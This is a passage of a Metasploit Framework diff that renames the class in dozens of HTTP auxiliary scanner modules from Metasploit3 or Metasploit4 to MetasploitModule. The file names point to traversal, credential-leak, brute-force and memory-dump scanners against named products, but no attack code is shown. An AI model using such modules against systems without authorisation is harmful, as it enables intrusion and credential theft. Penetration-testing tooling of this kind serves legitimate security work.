'metasploit/framework/login_scanner/manageengine_desktop_central' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb index 2204a9ecda..3596a665a0 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb index 3d6acc979a..2dd58d4e3f 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index 77d6dc7091..5f44f9f3c9 100644 --- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb index 6724111d4e..a23e7ede47 100644 --- a/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb +++ b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb index 0c403db076..4a15cd0776 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb index 8fc76e5fe0..691c59099e 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index 8f60998e85..110daab153 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb index 8a5734b6b9..ef0ddc1d8d 100644 --- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb +++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/mybook_live_login.rb b/modules/auxiliary/scanner/http/mybook_live_login.rb index caeca141c7..10a8ce6b42 100644 --- a/modules/auxiliary/scanner/http/mybook_live_login.rb +++ b/modules/auxiliary/scanner/http/mybook_live_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mybook_live' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/netdecision_traversal.rb b/modules/auxiliary/scanner/http/netdecision_traversal.rb index 0d6064563a..d4fd40dbbc 100644 --- a/modules/auxiliary/scanner/http/netdecision_traversal.rb +++ b/modules/auxiliary/scanner/http/netdecision_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index 5f7bb5fc2b..f6d645fbb2 100644 --- a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb index b49e3e4137..f75163ba05 100644 --- a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb index de18f8805b..9b3dd3137e 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb index cabefe1b8f..22a5fbd3ea 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/novell_mdm_creds.rb b/modules/auxiliary/scanner/http/novell_mdm_creds.rb index 3c03a14c2d..7008ed04f3 100644 --- a/modules/auxiliary/scanner/http/novell_mdm_creds.rb +++ b/modules/auxiliary/scanner/http/novell_mdm_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 6bcc2dcb1e..b7c4bbfa14 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/open_proxy.rb b/modules/auxiliary/scanner/http/open_proxy.rb index 123e89d6df..6ec76f75bb 100644 --- a/modules/auxiliary/scanner/http/open_proxy.rb +++ b/modules/auxiliary/scanner/http/open_proxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login.rb b/modules/auxiliary/scanner/http/openmind_messageos_login.rb index 3402e97dd7..75520d32ff 100644 --- a/modules/auxiliary/scanner/http/openmind_messageos_login.rb +++ b/modules/auxiliary/scanner/http/openmind_messageos_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb index 1839e47ddd..466c9b75c3 100644 --- a/modules/auxiliary/scanner/http/options.rb +++ b/modules/auxiliary/scanner/http/options.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb index 4d69c421a2..d2a1490cc7 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb index f536b5a39a..6a078da9a3 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb index 2f1167132c..de82331fa2 100644 --- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb +++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb b/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb index 542b5ef896..ea870025cb 100644 --- a/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index b2393bbd3b..7e47188cb2 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index f1107f89a4..5c4700f54a 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb index fea9b90324..8a219052e8 100644 --- a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb +++ b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb index abcb16ce3f..bc84d5d8a6 100644 --- a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb +++ b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb index cb12852868..a156661b3a 100644 --- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/rails_mass_assignment.rb b/modules/auxiliary/scanner/http/rails_mass_assignment.rb index 5bdbe7bed5..6016a75b8a 100644 --- a/modules/auxiliary/scanner/http/rails_mass_assignment.rb +++ b/modules/auxiliary/scanner/http/rails_mass_assignment.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'uri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index 3e6f52150b..c1dfa907e7 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index 3537b86519..c48ab07a08 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -9,7 +9,7 @@ require 'pathname' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb index a7ce79c852..4da2079121 100644 --- a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb +++ b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index cb103e7da7..9bd3cc4909 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/rips_traversal.rb b/modules/auxiliary/scanner/http/rips_traversal.rb index 2b42cb8c54..fb1a847654 100644 --- a/modules/auxiliary/scanner/http/rips_traversal.rb +++ b/modules/auxiliary/scanner/http/rips_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/robots_txt.rb b/modules/auxiliary/scanner/http/robots_txt.rb index 4d9933953b..e53d89e7de 100644 --- a/modules/auxiliary/scanner/http/robots_txt.rb +++ b/modules/auxiliary/scanner/http/robots_txt.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb index 49fa51058f..a4c42efdba 100644 --- a/modules/auxiliary/scanner/http/s40_traversal.rb +++ b/modules/auxiliary/scanner/http/s40_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index f83d2b5033..ead59e4e57 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb index aef82de583..ddd41a24b6 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index f56d659877..51b10cf29b 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index 8e33ae7cea..930dd36d87 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb index 817d830d11..4533882e40 100644 --- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb index 7567b73111..f5481de390 100644 --- a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb +++ b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb index 64f8ba1137..cd1f376ed9 100644 --- a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb +++ b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sevone_enum.rb b/modules/auxiliary/scanner/http/sevone_enum.rb index 9e8a38d6c5..2551a650e7 100644 --- a/modules/auxiliary/scanner/http/sevone_enum.rb +++ b/modules/auxiliary/scanner/http/sevone_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index 19c37446a5..6e556b22b2 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb index c7f90ebff3..db3b4664b9 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb index 26cd5777e9..cb90ba8639 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb index e145de83eb..b5ed85615d 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb index b7a87ad514..ad85196211 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/soap_xml.rb b/modules/auxiliary/scanner/http/soap_xml.rb index adc6eb3a10..7b79dae7cf 100644 --- a/modules/auxiliary/scanner/http/soap_xml.rb +++ b/modules/auxiliary/scanner/http/soap_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/sockso_traversal.rb b/modules/auxiliary/scanner/http/sockso_traversal.rb index b9deea0f9c..17ef2fb7bd 100644 --- a/modules/auxiliary/scanner/http/sockso_traversal.rb +++ b/modules/auxiliary/scanner/http/sockso_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb index 35833d09af..329a3d0257 100644 --- a/modules/auxiliary/scanner/http/splunk_web_login.rb +++ b/modules/auxiliary/scanner/http/splunk_web_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index 77969a4f9e..0e51d19f55 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/socket/range_walker' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index 56a0b065c0..043a2942e9 100644 --- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb index fb132e01e5..a9d83972b3 100644 --- a/modules/auxiliary/scanner/http/ssl.rb +++ b/modules/auxiliary/scanner/http/ssl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::WmapScanSSL diff --git a/modules/auxiliary/scanner/http/ssl_version.rb b/modules/auxiliary/scanner/http/ssl_version.rb index ee3e135338..d4c1612796 100644 --- a/modules/auxiliary/scanner/http/ssl_version.rb +++ b/modules/auxiliary/scanner/http/ssl_version.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb index 015e81013f..cccf57bee8 100644 --- a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index 1c2f5a2132..be40bb0c17 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb index 3a388d677a..f15b931185 100644 --- a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include 